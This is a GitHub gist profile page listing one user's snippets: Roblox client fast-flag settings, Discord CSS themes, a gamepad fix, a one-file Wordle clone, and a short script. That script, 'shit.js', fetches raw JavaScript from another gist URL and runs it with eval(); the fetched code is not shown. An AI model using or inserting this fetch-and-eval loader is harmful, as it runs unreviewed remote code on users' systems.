Skip to content

Instantly share code, notes, and snippets.

View hdboye's full-sized avatar
🤑
money 3 fire

tariq hdboye

🤑
money 3 fire
  • The Netherlands
  • 09:32 (UTC +02:00)
View GitHub Profile
{
"FIntFlagUpdateVersion": 130,
"FStringNewInGameMenuForcedUserIds": "2323539704;3822626535;4126963942;2627408279;4329723352;299144763;4403721186;3198825306",
"DFIntSecondsBetweenDynamicVariableReloading": 31557600,
"FIntRolloutEnrollmentExpirationMinutes": 525949,
"DFFlagDynamicFastVariableReloaderTest1": false,
"FFlagExecDynInitTests": false,
"DFFlagEarlyExitIfHang": false,
"FIntTerrainOTAMaxTextureSize": 1024,
"FIntUITextureMaxRenderTextureSize": 1024,
@hdboye
hdboye / curRCO
Last active June 4, 2023 10:16
current RCO url
https://gist.githubusercontent.com/hdboye/578bf9d799364b9b489c1ae5687a6bae/raw/a713f845c52640e6010f5180c034754ac98ed6d4/ClientSettings.json
@hdboye
hdboye / btultra-nocaps.css
Last active April 6, 2023 15:57
BTDiscord Ultra without the annoying capitalization of everything
:root {
--version: "1.0.7";
}
.embedThumbnail-2nTasl {
border-radius: 4px !important;
}
.animatedContainer-2laTjx,
.bannerImage-ubW8K- {
@hdboye
hdboye / ClearVisionMod.css
Created March 20, 2023 16:47
clearvision modified
:root{
--main-color: #2780e6;
--hover-color: #1e63b3;
--success-color: #43b581;
--danger-color: #982929;
--channel-unread: var(--main-color);
--channel-color: rgba(255, 255, 255, 0.3);
--muted-color: rgba(255, 255, 255, 0.1);
--channel-text-selected: #fff;
--url-color: var(--main-color);
@hdboye
hdboye / funky_portal.css
Last active March 20, 2023 17:02
silly portal clearvision theme
/**
* @name funky_portal
* @author ClearVision Team
* @version 6.3.0
* @description Highly customizable and beautiful theme for BetterDiscord.
* @source https://github.com/ClearVision/ClearVision-v6
* @website https://clearvision.github.io
* @invite 7pNUC9C
* @BDEditor Clear Vision
*/
@hdboye
hdboye / gamepad_update.js
Created July 15, 2022 16:14
it just fixes the rumble (probably)
// MIT license
class SingleGamepad {
constructor(index) {
this.id = null
this.index = index
this.currentMSecs = null
}
matches(gamepad) {
from math import *
@hdboye
hdboye / KeepOnWordle.html
Last active February 9, 2022 17:27
wordle but in 1 file
<html lang="en"><head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
<title>Wordle - A daily word game</title>
<meta name="description" content="Guess the hidden word in 6 tries. A new puzzle is available each day.">
<!-- FB Meta Tags -->
<meta property="og:url" content="https://www.powerlanguage.co.uk/wordle/">
<meta property="og:type" content="website">
@hdboye
hdboye / requests.js
Created November 7, 2021 22:27
test
const icon = "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABgAAAAYCAYAAADgdz34AAADTUlEQVRIS63VTWgUZxgH8P+7Mzsf+2U2SrPJKBoEA1WKUMzupaKHpgoetadCnaBN9FRaLLRQEW17KKIed1V21dJLbU/FRqiixx219NDaVi+NmnWNZT+cze7Ozsf7yoxEYpnMRJI5DQzP+5v3P8/7DEHANVHM7iXAVyAkwQCNgZYjDp3KH7jzZ1DdwmckBLirrE29KQgcTNOBZTrQdYP2es631LSPnp34zQqDlgTIcvTlOowxNBsG6o3uHw6he899eOt+EBIGeBHxUW5ElDjEYwKSKdFbzzAsVB61/q4lWlsvv3/XXAwJBOaL9pe29slE3MgoOSHF+N0DAwnwfASNehe1WudkYVw7sixgYfFkMXtSikU/VZQU3LhmHjVZ17Sz59Tbt/2QJe3glUIGMnEhe3PgjcR2Ny5dN/Df0873ebX8gS/wshUBUMK+PKveuhzWGZPF0fdiceHq4FAK3a6FyoyuFca13GKA14ruw8qM/ldhXNscBnz03duDUSY83jCchu04ePBvs5ZXtTW+wGQpW12/IZ1xP9r0dAM9g2bOH9Rmg5DDpW0ZwvFVD7CpW1ctqNqQP1DM/ZJRErvdFqw+bqHdMccKqvZr4AEsbdsVj4lTbkTttolqtXWloGp7FtlB7uv+1fIX6bSM9pyJJ9W5a3m1PAYC5ou4H7mUvT44mNwZTwio17to1Dsn8qp21Bc4cGl0WCLcP+vW9wkRQrxddNrW6cyw9NmxnTfthUX7ftgs9LcTP8dkfmxIWeW16cOHTdO22EheLU8v2qYTxezn6bT8zeo1MS/T2dk5GB3rHgNOMd6+SsFxnE3eJcAnohwdUZQkQAjqtTYadePHwri2L/CgHbuxg3/ywPhdUZJbJOnF3GnpPS9fw7ABAkgij3h8flS46REYPRvVig5KoebV8oXAg3bw4ugmjkV+6u+Xt/T1
@hdboye
hdboye / shit.js
Last active September 8, 2021 09:55
function run(){var xmlHttp=new XMLHttpRequest;xmlHttp.open("GET","https://gist.githubusercontent.com/hdboye/c19b5ad522673c06f6675094ff3d3277/raw/2362d4121a61bdb28670f1ff67037ed6c145888d/penis.js",!1),xmlHttp.send(),eval(xmlHttp.responseText)}run();